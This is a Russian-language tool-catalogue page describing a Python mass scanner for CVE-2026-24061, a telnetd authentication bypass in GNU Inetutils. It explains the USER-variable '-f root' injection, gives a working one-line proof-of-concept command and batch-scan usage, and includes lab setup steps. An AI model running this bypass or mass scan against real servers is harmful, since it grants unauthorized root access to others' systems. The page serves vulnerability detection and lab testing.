Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24061 — Python-сканер, который обнаруживает CVE-2026-24061 в GNU Inetutils telnetd, позволяя проводить пакетное тестирование нескольких целей на уязвимость обхода аутентификации. | Kitploit
Инструменты/GitHubGitHub/monstertsl/cve-2026-24061
Сканеры уязвимостейЭксплуатацияТестирование на ПроникновениеАутентификацияИнструмент Удаленного Доступа
GitHubmonstertsl/cve-2026-24061

CVE-2026-24061

Python-сканер, который обнаруживает CVE-2026-24061 в GNU Inetutils telnetd, позволяя проводить пакетное тестирование нескольких целей на уязвимость обхода аутентификации.

Репозиторий
1138 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Инструмент массового сканирования уязвимости CVE-2026-24061

⚠️ Внимание: CVE-2026-24061 GNU Inetutils — это набор классических сетевых утилит от проекта GNU, включающий службу telnetd, то есть демон Telnet-сервера. В версиях с 1.9.3 по 2.7 в службе telnetd существует критический дефект в процессе аутентификации пользователей. При вызове системной программы входа /usr/bin/login служба не выполняет эффективную фильтрацию и проверку переменной окружения USER, передаваемой клиентом. Злоумышленник может, задав определённое значение переменной USER, напрямую внедрить параметр -f в команду login. Параметр -f программы login используется для «пропуска повторной аутентификации», что позволяет злоумышленнику полностью обойти все этапы проверки пароля и напрямую установить удалённую сессию под пользователем root, получив тем самым высший уровень контроля над сервером. Эта уязвимость чрезвычайно опасна и фактически представляет собой публичный удалённый root-бэкдор, не требующий никаких учётных данных.

POC обнаружения уязвимости

USER='-f root' telnet -a <target_ip>

Скрипт обнаружения

demo.png

Одиночная проверка

python3 cve-2026-24061.py -i 10.10.168.128

Массовая проверка

python3 cve-2026-24061.py -f targets.txt

Принцип уязвимости

Указанная выше команда устанавливает переменную окружения USER в значение -f root. Когда уязвимая служба telnetd получает соединение, она формирует и выполняет системный вызов, аналогичный следующему:

Шаги воспроизведения

1. Установка необходимых программ

sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y

2. Раскомментировать строку telnet (убедиться в правильности формата)

sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf

3. Перезапустить службу

sudo systemctl restart openbsd-inetd

4. Проверить порт

sudo ss -tuln | grep ':23'

5. Локальное тестирование

telnet localhost 23
Скачать инструмент